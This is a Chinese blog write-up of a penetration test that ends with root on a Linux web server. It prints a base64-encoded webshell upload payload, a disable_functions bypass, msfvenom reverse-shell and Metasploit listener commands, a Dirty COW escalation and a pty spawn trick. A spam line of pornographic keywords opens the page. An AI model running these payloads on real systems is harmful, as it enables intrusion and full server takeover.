一区二区三区三上|欧美在线视频五区|国产午夜无码在线观看视频|亚洲国产裸体网站|无码成年人影视|亚洲AV亚洲AV|成人开心激情五月|欧美性爱内射视频|超碰人人干人人上|一区二区无码三区亚洲人区久久精品

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

記腳本小子的一次滲透全過(guò)程

jf_Fo0qk3ln ? 來(lái)源:菜鳥(niǎo)學(xué)信安 ? 2023-06-14 09:21 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

一.前言

在一次綜合滲透的過(guò)程中遇到的比較完整的一個(gè)滲透流程。很多現(xiàn)查的技巧,這次滲透的基礎(chǔ)是基于隊(duì)友已經(jīng)在服務(wù)器寫入了一句話木馬但無(wú)法執(zhí)行系統(tǒng)命令。 二.滲透過(guò)程 一開(kāi)始,我想到的是傳個(gè)大馬上去,為了方便,先寫入了一個(gè)上傳馬:

?a=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));
4404c354-0a4b-11ee-962d-dac502259ad0.png 利用這個(gè)上傳馬(shell.php)上傳了一個(gè)比較常用的大馬(297.php)。發(fā)現(xiàn)無(wú)法執(zhí)行系統(tǒng)命令(無(wú)回顯):

441f21c2-0a4b-11ee-962d-dac502259ad0.png

查看phpinfo()發(fā)現(xiàn)應(yīng)該是disable_function()的原因。隨即使用github上大佬LD_PRELOAD的bypass馬:


https://github.com/zhinaonet/bypass_disablefunc_via_LD_PRELOAD 成功執(zhí)行命令:

4439da1c-0a4b-11ee-962d-dac502259ad0.png

可以執(zhí)行命令后便想著提權(quán),直接上虛擬機(jī)里的kali先用ngrok把虛擬機(jī)里的內(nèi)網(wǎng)穿透出去:

4448f1a0-0a4b-11ee-962d-dac502259ad0.png

啟動(dòng)msf:


msfconsole msfvenom -l payloads msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=ip LPORT=10017 -f elf > shell.elf 生成反彈shell:

44714740-0a4b-11ee-962d-dac502259ad0.png


use exploit/multi/handler set PAYLOAD linux/x64/meterpreter_reverse_tcp set LHOST 192.168.1.170 set LPORT 4444 run 開(kāi)啟監(jiān)聽(tīng),同時(shí)把生成的elf文件用上傳馬上傳到服務(wù)器,用bypass馬chmod賦予權(quán)限后執(zhí)行。 即可反彈成功:

44938b8e-0a4b-11ee-962d-dac502259ad0.png

拿到反彈shell后就想著提權(quán),一看內(nèi)核版本是在臟牛的覆蓋范圍,就嘗試臟牛一把梭。 先去github上下載臟牛的exp源碼:


https://github.com/FireFart/dirtycow 上傳上去之后執(zhí)行命令:

gcc -pthread dirty.c -o dirty -lcrypt ./dirty 執(zhí)行成功! 但在su切換用戶的時(shí)候出現(xiàn)了幺蛾子:

44bdf7e8-0a4b-11ee-962d-dac502259ad0.png

Standard in must be a tty這種情況我還是頭一次遇見(jiàn)。通過(guò)查詢,發(fā)現(xiàn)可以用python繞過(guò)它:


python -c 'import pty; pty.spawn("/bin/sh")' su firefart

輸入密碼,即可提權(quán)成功:

4501bdfc-0a4b-11ee-962d-dac502259ad0.png

于此已經(jīng)拿到了root權(quán)限。后滲透階段由于本人不太熟悉就暫且不提了。

三.總結(jié) 這次滲透沒(méi)有什么特別難的難點(diǎn),主要是隊(duì)友把一句話傳上去打了個(gè)好的基礎(chǔ)。作為腳本小子的我也不過(guò)是用網(wǎng)上大佬們的工具完成了此次滲透。學(xué)藝不精還需要繼續(xù)和菊苣們學(xué)習(xí)。

責(zé)任編輯:彭菁

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 服務(wù)器
    +關(guān)注

    關(guān)注

    13

    文章

    9757

    瀏覽量

    87591
  • 滲透
    +關(guān)注

    關(guān)注

    0

    文章

    21

    瀏覽量

    6388
  • 腳本
    +關(guān)注

    關(guān)注

    1

    文章

    397

    瀏覽量

    28406

原文標(biāo)題:實(shí)戰(zhàn)|記腳本小子的一次滲透全過(guò)程

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    筆記本組裝全過(guò)程圖解.pdf

    筆記本組裝全過(guò)程圖解.pdf
    發(fā)表于 12-26 21:22

    熱轉(zhuǎn)印電路板制作全過(guò)程

    熱轉(zhuǎn)印電路板制作全過(guò)程
    發(fā)表于 06-24 00:46

    PCB 制作全過(guò)程

    `PCB 制作全過(guò)程。`
    發(fā)表于 08-05 22:43

    音箱制作全過(guò)程

    音箱制作全過(guò)程
    發(fā)表于 08-16 17:00

    有人分享制作藍(lán)牙耳機(jī)的全過(guò)程嗎?

    我想自己制作個(gè)藍(lán)牙耳機(jī),但是技術(shù)不夠,希望有人分享下藍(lán)牙耳機(jī)的制作全過(guò)程,可以是模塊應(yīng)用,最好是從底層開(kāi)始制作的,包括軟件的編寫代碼。{:23:}
    發(fā)表于 06-02 18:42

    分享個(gè)串口實(shí)現(xiàn)全過(guò)程好資料

    偶然中看到的篇好資料,不敢獨(dú)享,來(lái)給大家分享下,這里有特別詳細(xì)的串口實(shí)現(xiàn)通信的全過(guò)程,親自操作遍,可零基礎(chǔ)實(shí)現(xiàn)串口通信,希望能幫助到大家!
    發(fā)表于 02-05 17:18

    中夏s66e組裝全過(guò)程

    中夏s66e組裝全過(guò)程視頻、圖解?????
    發(fā)表于 05-12 11:33

    講述PCB設(shè)計(jì)全過(guò)程操作

    網(wǎng)上AD教程看似很多,實(shí)則零散,詳細(xì)地講述PCB設(shè)計(jì)全過(guò)程操作的實(shí)用教程并不多,而且大都是舊版本的AD,所以本人寫了個(gè)詳盡的手把手畫板教程,內(nèi)容是目前的流行單片機(jī):stm32的最小系統(tǒng),新手也能快速上手本教程分為三篇:元件庫(kù)的建立,原理圖的畫法,P...
    發(fā)表于 08-03 07:40

    CPU制造全過(guò)程

    CPU制造全過(guò)程第1頁(yè):由沙到晶圓,CPU誕生全過(guò)程     沙中含有25%的硅,是地殼中第二多元素,在經(jīng)過(guò)氧化之后就成為了二氧化硅,在沙,尤其是石英中二氧
    發(fā)表于 09-22 08:08 ?77次下載

    組裝電腦全過(guò)程視頻教程

    組裝電腦全過(guò)程視頻教程 教你認(rèn)識(shí)電腦主機(jī)各種配件及組裝接線方法
    發(fā)表于 09-14 11:05 ?467次下載

    Uboot啟動(dòng)的全過(guò)程詳細(xì)資料分析

    本文檔的主要內(nèi)容詳細(xì)介紹的是Uboot啟動(dòng)的全過(guò)程詳細(xì)資料分析。
    發(fā)表于 04-25 08:00 ?6次下載
    Uboot啟動(dòng)的<b class='flag-5'>全過(guò)程</b>詳細(xì)資料分析

    用C語(yǔ)言開(kāi)發(fā)DSP系統(tǒng)的全過(guò)程的講解

    用C語(yǔ)言開(kāi)發(fā)DSP系統(tǒng)的全過(guò)程的講解。
    發(fā)表于 05-26 14:17 ?22次下載

    手工制作pcb全過(guò)程

    手工制作pcb全過(guò)程介紹。
    發(fā)表于 06-19 10:18 ?0次下載

    芯片制造全過(guò)程

    有人說(shuō)芯片是人類最高智慧的代表,很多人都無(wú)法理解,接下來(lái)跟隨小編起了解芯片的制作全過(guò)程,看完你就懂了。
    的頭像 發(fā)表于 12-08 17:42 ?1.2w次閱讀

    電磁爐的維修全過(guò)程分享

    電磁爐的維修全過(guò)程分享
    發(fā)表于 01-10 15:16 ?84次下載